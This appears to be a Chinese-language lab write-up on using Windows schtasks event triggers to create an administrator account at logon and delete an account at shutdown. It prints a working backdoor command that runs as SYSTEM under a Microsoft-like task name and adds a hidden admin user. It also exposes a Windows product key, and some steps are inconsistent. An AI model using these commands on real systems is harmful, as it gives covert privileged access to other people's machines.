網絡攻防任務二：開機、關機事件觸發帳戶的建立與刪除

 

1、任務要求

設計一個以開機、關機事件爲觸發條件的計劃任務，實現:

一、開機時新建一個用戶

二、關機時刪除用戶

 

 

2、解決步驟

（一）實驗環境搭建

事件觸發的命令是schtasks。

利用schtasks完成的功能主要是：利用肯定的日誌事件觸發net user命令，以達到新增一個管理員帳戶的目的。

若是利用傳統的at命令，首先沒法用日誌事件觸發，其次須要執行多條命令行時，只能將它們編寫成.bat的批處理文件進行處理。

 

因爲要用到事件觸發，xp沒有這個功能，因此要新建一個win7的虛擬機。

Win7激活祕鑰爲YKHFT KW986 GK4PY FDWYH 7TP9F

 

（二）開機建立用戶

Schtasks的用法描述:

 

    容許管理員建立、刪除、查詢、更改、運行和停止本地或遠程系統上的計劃任

    務。

 

參數列表:

    /Create         建立新計劃任務。

 

    /Delete         刪除計劃任務。

 

    /Query          顯示全部計劃任務。

 

    /Change         更改計劃任務屬性。

 

    /Run            按需運行計劃任務。

 

    /End            停止當前正在運行的計劃任務。

 

    /ShowSid        顯示與計劃的任務名稱相應的安全標識符。

 

    /?              顯示此幫助消息。

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

開機事件的事件ID爲4624，所以代碼以下：

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"

直接在命令行窗口下輸入這行代碼便可。

 

 

 

 

 

 

 

 

重啓的時候有登陸窗口，緣由是關機的時候帳戶未刪。

 

 

 

 

 

（三）關機刪除用戶

經查詢關機事件ID爲1074。

代碼以下：

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

關機以前先檢查一下帳戶狀況

 

 

 

 

 

重啓以後，結果以下圖所示，帳戶已被刪除。

 

 

 

 

開機後，再輸入net user，能夠看到帳戶在開機以後也創建成功了。